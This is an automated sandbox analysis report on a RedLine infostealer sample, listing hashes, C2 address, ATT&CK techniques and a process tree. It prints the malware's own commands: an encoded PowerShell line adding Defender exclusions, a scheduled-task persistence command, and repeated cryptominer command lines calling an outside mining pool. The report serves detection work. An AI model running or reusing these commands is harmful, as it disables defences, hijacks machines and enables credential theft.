redline | 6903e33821d3a689d41e5e45cfd1e9bbb08109b741fe199b030e7e2875d7fbe5

Analysis

max time kernel
144s
max time network
116s
platform
windows7_x64
resource
win7-20220414-en
submitted
23-05-2022 06:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d836a3e33d4b12926305b2c06ffc64d2.exe
Size

1.8MB
MD5

d836a3e33d4b12926305b2c06ffc64d2
SHA1

38960dd289e058379ed31ccc66ae9ad62eebe409
SHA256

6903e33821d3a689d41e5e45cfd1e9bbb08109b741fe199b030e7e2875d7fbe5
SHA512

af4fc4608624e7f616bed02a08a05cc4bbb7d16094eac3b125601460bd0662f5bf7a0431e94cc41b0deebd84a22e8a64b85d39e7fc7cdf1aaafbc1e4d4d8f23c

Score

10^/10

redline infostealer spyware upx

Malware Config

Extracted

Family

redline

141.95.140.173:33470

Attributes

auth_value
aa37980e94b4eaaea7ea880fc1c6804d

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline
Downloads MZ/PE file
Executes dropped EXE 2 IoCs

Processes:

updated.exeupdateed.exe

pid process

748 updated.exe
1028 updateed.exe

pid	process
748	updated.exe
1028	updateed.exe

UPX packed file 9 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\updated.exe	upx
\Users\Admin\AppData\Local\Temp\updated.exe	upx
C:\Users\Admin\AppData\Local\Temp\updated.exe	upx
C:\Users\Admin\AppData\Local\Temp\updated.exe	upx
behavioral1/memory/1468-124-0x00000000FFD30000-0x000000010051C000-memory.dmp	upx
behavioral1/memory/1468-126-0x00000000FFD30000-0x000000010051C000-memory.dmp	upx
behavioral1/memory/1468-128-0x00000000FFD30000-0x000000010051C000-memory.dmp	upx
behavioral1/memory/1468-130-0x00000000FFD30000-0x000000010051C000-memory.dmp	upx
behavioral1/memory/1468-131-0x00000000FFD30000-0x000000010051C000-memory.dmp	upx

Drops startup file 2 IoCs

Processes:

AppLaunch.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome updater.exe	AppLaunch.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome updater.exe	AppLaunch.exe

Loads dropped DLL 6 IoCs

Processes:

AppLaunch.exeupdateed.exe

pid process

980 AppLaunch.exe
980 AppLaunch.exe
980 AppLaunch.exe
1028 updateed.exe
1028 updateed.exe
1028 updateed.exe
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

pid	process
980	AppLaunch.exe
980	AppLaunch.exe
980	AppLaunch.exe
1028	updateed.exe
1028	updateed.exe
1028	updateed.exe

Suspicious use of SetThreadContext 38 IoCs

Processes:

d836a3e33d4b12926305b2c06ffc64d2.exeAppLaunch.exeupdateed.exeupdated.exe

description	pid	process	target process
PID 1892 set thread context of 1364	1892	d836a3e33d4b12926305b2c06ffc64d2.exe	AppLaunch.exe
PID 1364 set thread context of 1940	1364	AppLaunch.exe	AppLaunch.exe
PID 1364 set thread context of 980	1364	AppLaunch.exe	AppLaunch.exe
PID 1028 set thread context of 1368	1028	updateed.exe	AppLaunch.exe
PID 748 set thread context of 1468	748	updated.exe	explorer.exe
PID 748 set thread context of 1588	748	updated.exe	explorer.exe
PID 748 set thread context of 1664	748	updated.exe	explorer.exe
PID 748 set thread context of 1684	748	updated.exe	explorer.exe
PID 748 set thread context of 544	748	updated.exe	explorer.exe
PID 748 set thread context of 1200	748	updated.exe	explorer.exe
PID 748 set thread context of 1340	748	updated.exe	explorer.exe
PID 748 set thread context of 980	748	updated.exe	explorer.exe
PID 748 set thread context of 1592	748	updated.exe	explorer.exe
PID 748 set thread context of 1880	748	updated.exe	explorer.exe
PID 748 set thread context of 1056	748	updated.exe	explorer.exe
PID 748 set thread context of 1756	748	updated.exe	explorer.exe
PID 748 set thread context of 1628	748	updated.exe	explorer.exe
PID 748 set thread context of 1344	748	updated.exe	explorer.exe
PID 748 set thread context of 1760	748	updated.exe	explorer.exe
PID 748 set thread context of 584	748	updated.exe	explorer.exe
PID 748 set thread context of 1884	748	updated.exe	explorer.exe
PID 748 set thread context of 2032	748	updated.exe	explorer.exe
PID 748 set thread context of 2004	748	updated.exe	explorer.exe
PID 748 set thread context of 1736	748	updated.exe	explorer.exe
PID 748 set thread context of 1112	748	updated.exe	explorer.exe
PID 748 set thread context of 1724	748	updated.exe	explorer.exe
PID 748 set thread context of 1656	748	updated.exe	explorer.exe
PID 748 set thread context of 112	748	updated.exe	explorer.exe
PID 748 set thread context of 1352	748	updated.exe	explorer.exe
PID 748 set thread context of 1864	748	updated.exe	explorer.exe
PID 748 set thread context of 612	748	updated.exe	explorer.exe
PID 748 set thread context of 1476	748	updated.exe	explorer.exe
PID 748 set thread context of 2012	748	updated.exe	explorer.exe
PID 748 set thread context of 1876	748	updated.exe	explorer.exe
PID 748 set thread context of 1920	748	updated.exe	explorer.exe
PID 748 set thread context of 888	748	updated.exe	explorer.exe
PID 748 set thread context of 836	748	updated.exe	explorer.exe
PID 748 set thread context of 1452	748	updated.exe	explorer.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1584 schtasks.exe
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.

Processes:

description flow ioc

HTTP User-Agent header 9 Go-http-client/1.1
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

AppLaunch.exepowershell.exe

pid process

1940 AppLaunch.exe
1940 AppLaunch.exe
1808 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

AppLaunch.exeAppLaunch.exepowershell.exe

description pid process

Token: SeDebugPrivilege 980 AppLaunch.exe
Token: SeDebugPrivilege 1940 AppLaunch.exe
Token: SeDebugPrivilege 1808 powershell.exe

pid	process
1584	schtasks.exe

description	flow	ioc
HTTP User-Agent header	9	Go-http-client/1.1

pid	process
1940	AppLaunch.exe
1940	AppLaunch.exe
1808	powershell.exe

description	pid	process
Token: SeDebugPrivilege	980	AppLaunch.exe
Token: SeDebugPrivilege	1940	AppLaunch.exe
Token: SeDebugPrivilege	1808	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

d836a3e33d4b12926305b2c06ffc64d2.exeAppLaunch.exeAppLaunch.exeupdated.execmd.exeupdateed.exe

description	pid	process	target process
PID 1892 wrote to memory of 1364	1892	d836a3e33d4b12926305b2c06ffc64d2.exe	AppLaunch.exe
PID 1892 wrote to memory of 1364	1892	d836a3e33d4b12926305b2c06ffc64d2.exe	AppLaunch.exe
PID 1892 wrote to memory of 1364	1892	d836a3e33d4b12926305b2c06ffc64d2.exe	AppLaunch.exe
PID 1892 wrote to memory of 1364	1892	d836a3e33d4b12926305b2c06ffc64d2.exe	AppLaunch.exe
PID 1892 wrote to memory of 1364	1892	d836a3e33d4b12926305b2c06ffc64d2.exe	AppLaunch.exe
PID 1892 wrote to memory of 1364	1892	d836a3e33d4b12926305b2c06ffc64d2.exe	AppLaunch.exe
PID 1892 wrote to memory of 1364	1892	d836a3e33d4b12926305b2c06ffc64d2.exe	AppLaunch.exe
PID 1892 wrote to memory of 1364	1892	d836a3e33d4b12926305b2c06ffc64d2.exe	AppLaunch.exe
PID 1892 wrote to memory of 1364	1892	d836a3e33d4b12926305b2c06ffc64d2.exe	AppLaunch.exe
PID 1364 wrote to memory of 1940	1364	AppLaunch.exe	AppLaunch.exe
PID 1364 wrote to memory of 1940	1364	AppLaunch.exe	AppLaunch.exe
PID 1364 wrote to memory of 1940	1364	AppLaunch.exe	AppLaunch.exe
PID 1364 wrote to memory of 1940	1364	AppLaunch.exe	AppLaunch.exe
PID 1364 wrote to memory of 1940	1364	AppLaunch.exe	AppLaunch.exe
PID 1364 wrote to memory of 1940	1364	AppLaunch.exe	AppLaunch.exe
PID 1364 wrote to memory of 1940	1364	AppLaunch.exe	AppLaunch.exe
PID 1364 wrote to memory of 1940	1364	AppLaunch.exe	AppLaunch.exe
PID 1364 wrote to memory of 1940	1364	AppLaunch.exe	AppLaunch.exe
PID 1364 wrote to memory of 1940	1364	AppLaunch.exe	AppLaunch.exe
PID 1364 wrote to memory of 1940	1364	AppLaunch.exe	AppLaunch.exe
PID 1364 wrote to memory of 1940	1364	AppLaunch.exe	AppLaunch.exe
PID 1364 wrote to memory of 980	1364	AppLaunch.exe	AppLaunch.exe
PID 1364 wrote to memory of 980	1364	AppLaunch.exe	AppLaunch.exe
PID 1364 wrote to memory of 980	1364	AppLaunch.exe	AppLaunch.exe
PID 1364 wrote to memory of 980	1364	AppLaunch.exe	AppLaunch.exe
PID 1364 wrote to memory of 980	1364	AppLaunch.exe	AppLaunch.exe
PID 1364 wrote to memory of 980	1364	AppLaunch.exe	AppLaunch.exe
PID 1364 wrote to memory of 980	1364	AppLaunch.exe	AppLaunch.exe
PID 1364 wrote to memory of 980	1364	AppLaunch.exe	AppLaunch.exe
PID 1364 wrote to memory of 980	1364	AppLaunch.exe	AppLaunch.exe
PID 1364 wrote to memory of 980	1364	AppLaunch.exe	AppLaunch.exe
PID 1364 wrote to memory of 980	1364	AppLaunch.exe	AppLaunch.exe
PID 1364 wrote to memory of 980	1364	AppLaunch.exe	AppLaunch.exe
PID 980 wrote to memory of 748	980	AppLaunch.exe	updated.exe
PID 980 wrote to memory of 748	980	AppLaunch.exe	updated.exe
PID 980 wrote to memory of 748	980	AppLaunch.exe	updated.exe
PID 980 wrote to memory of 748	980	AppLaunch.exe	updated.exe
PID 980 wrote to memory of 1028	980	AppLaunch.exe	updateed.exe
PID 980 wrote to memory of 1028	980	AppLaunch.exe	updateed.exe
PID 980 wrote to memory of 1028	980	AppLaunch.exe	updateed.exe
PID 980 wrote to memory of 1028	980	AppLaunch.exe	updateed.exe
PID 980 wrote to memory of 1028	980	AppLaunch.exe	updateed.exe
PID 980 wrote to memory of 1028	980	AppLaunch.exe	updateed.exe
PID 980 wrote to memory of 1028	980	AppLaunch.exe	updateed.exe
PID 748 wrote to memory of 1804	748	updated.exe	cmd.exe
PID 748 wrote to memory of 1804	748	updated.exe	cmd.exe
PID 748 wrote to memory of 1804	748	updated.exe	cmd.exe
PID 1804 wrote to memory of 1808	1804	cmd.exe	powershell.exe
PID 1804 wrote to memory of 1808	1804	cmd.exe	powershell.exe
PID 1804 wrote to memory of 1808	1804	cmd.exe	powershell.exe
PID 748 wrote to memory of 1584	748	updated.exe	schtasks.exe
PID 748 wrote to memory of 1584	748	updated.exe	schtasks.exe
PID 748 wrote to memory of 1584	748	updated.exe	schtasks.exe
PID 1028 wrote to memory of 1368	1028	updateed.exe	AppLaunch.exe
PID 1028 wrote to memory of 1368	1028	updateed.exe	AppLaunch.exe
PID 1028 wrote to memory of 1368	1028	updateed.exe	AppLaunch.exe
PID 1028 wrote to memory of 1368	1028	updateed.exe	AppLaunch.exe
PID 1028 wrote to memory of 1368	1028	updateed.exe	AppLaunch.exe
PID 1028 wrote to memory of 1368	1028	updateed.exe	AppLaunch.exe
PID 1028 wrote to memory of 1368	1028	updateed.exe	AppLaunch.exe
PID 1028 wrote to memory of 1368	1028	updateed.exe	AppLaunch.exe
PID 1028 wrote to memory of 1368	1028	updateed.exe	AppLaunch.exe
PID 748 wrote to memory of 1468	748	updated.exe	explorer.exe
PID 748 wrote to memory of 1468	748	updated.exe	explorer.exe

C:\Users\Admin\AppData\Local\Temp\d836a3e33d4b12926305b2c06ffc64d2.exe
"C:\Users\Admin\AppData\Local\Temp\d836a3e33d4b12926305b2c06ffc64d2.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1892

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1364

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1940

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:980

C:\Users\Admin\AppData\Local\Temp\updated.exe
"C:\Users\Admin\AppData\Local\Temp\updated.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:748

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjADgAMABkADYANgA5AGMAYwBlAGYAOQA4ADQAZgA2ADkAOQBjADkAMgA0AGUAYQA4ADgAOABiADcAYQBhAGEAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjADQAOABhAGYAOAA1AGMAMgBlAGIANAAzADQAZgBkADQAYgA4ADEAYQBhADMAYwAxAGUANwBkADcAYgBiADQANAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMANwBjAGQAYwBkADcAZgAwAGIAYwAyADQANAA4ADMANABhADYANgBlADkAOQBmADcAMwBlADcAZQA1AGQAMgA5ACMAPgAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjADMAZAAwADgAZABmAGMAYgAzADYAYgAyADQAOQA4ADcAOQBmAGIAZAAwAGEANwBjADEAZABlADgAMgAyADgANAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwA5ADIANgBlADIAYgBhAGQAMQBiAGYAMQA0ADkAMQA2ADkAYwA3AGMAMwAxAGIAZQBkAGUAZgAzADcANgBmADgAIwA+AA=="
5⤵
- Suspicious use of WriteProcessMemory
PID:1804

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjADgAMABkADYANgA5AGMAYwBlAGYAOQA4ADQAZgA2ADkAOQBjADkAMgA0AGUAYQA4ADgAOABiADcAYQBhAGEAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjADQAOABhAGYAOAA1AGMAMgBlAGIANAAzADQAZgBkADQAYgA4ADEAYQBhADMAYwAxAGUANwBkADcAYgBiADQANAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMANwBjAGQAYwBkADcAZgAwAGIAYwAyADQANAA4ADMANABhADYANgBlADkAOQBmADcAMwBlADcAZQA1AGQAMgA5ACMAPgAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjADMAZAAwADgAZABmAGMAYgAzADYAYgAyADQAOQA4ADcAOQBmAGIAZAAwAGEANwBjADEAZABlADgAMgAyADgANAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwA5ADIANgBlADIAYgBhAGQAMQBiAGYAMQA0ADkAMQA2ADkAYwA3AGMAMwAxAGIAZQBkAGUAZgAzADcANgBmADgAIwA+AA=="
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1808

C:\Windows\system32\schtasks.exe
schtasks /create /sc minute /mo 1 /tn "Runtime Broker" /rl HIGHEST /tr "C:\Users\Admin\AppData\Roaming\Runtime Broker\Runtime Broker"
5⤵
- Creates scheduled task(s)
PID:1584

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
5⤵
PID:1468

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
5⤵
PID:1588

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
5⤵
PID:1664

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
5⤵
PID:1684

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
5⤵
PID:544

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
5⤵
PID:1200

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
5⤵
PID:1340

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
5⤵
PID:980

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
5⤵
PID:1592

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
5⤵
PID:1880

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
5⤵
PID:1056

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
5⤵
PID:1756

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
5⤵
PID:1628

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
5⤵
PID:1344

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
5⤵
PID:1760

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
5⤵
PID:584

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
5⤵
PID:1884

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
5⤵
PID:2032

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
5⤵
PID:2004

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
5⤵
PID:1736

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
5⤵
PID:1112

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
5⤵
PID:1724

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
5⤵
PID:1656

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
5⤵
PID:112

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
5⤵
PID:1352

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
5⤵
PID:1864

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
5⤵
PID:612

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
5⤵
PID:1476

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
5⤵
PID:2012

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
5⤵
PID:1876

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
5⤵
PID:1920

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
5⤵
PID:888

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
5⤵
PID:836

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
5⤵
PID:1452

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
5⤵
PID:2024

C:\Users\Admin\AppData\Local\Temp\updateed.exe
"C:\Users\Admin\AppData\Local\Temp\updateed.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1028

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
5⤵
- Drops startup file
PID:1368

C:\Windows\system32\taskeng.exe
taskeng.exe {6EE32100-580E-428A-AF3F-1D36AD1FC2EA} S-1-5-21-790309383-526510583-3802439154-1000:TVHJCWMH\Admin:Interactive:[1]
1⤵
PID:832

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Credential Access

Credentials in Files

T1081

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\updated.exe
Filesize
4.8MB

MD5
b4aa27a1339c69d99121a4fe4fac94f7

SHA1
72cd9ebfd59e9c5a45c22dd5f6aa8d4cb9ba9d26

SHA256
a738f6016086abdd2824b797ec67feee3bc39d52b0b0ae94bd1384c58ed3d5d6

SHA512
3550565464695370bdc761327eea1502e523a8b5f5780c6d7942e2be480d40a262897009c6e459110ac0b146ad05f69f9c7d099ad88eaca39975907f95d3e184

Download Submit
C:\Users\Admin\AppData\Local\Temp\updated.exe
Filesize
4.8MB

MD5
b4aa27a1339c69d99121a4fe4fac94f7

SHA1
72cd9ebfd59e9c5a45c22dd5f6aa8d4cb9ba9d26

SHA256
a738f6016086abdd2824b797ec67feee3bc39d52b0b0ae94bd1384c58ed3d5d6

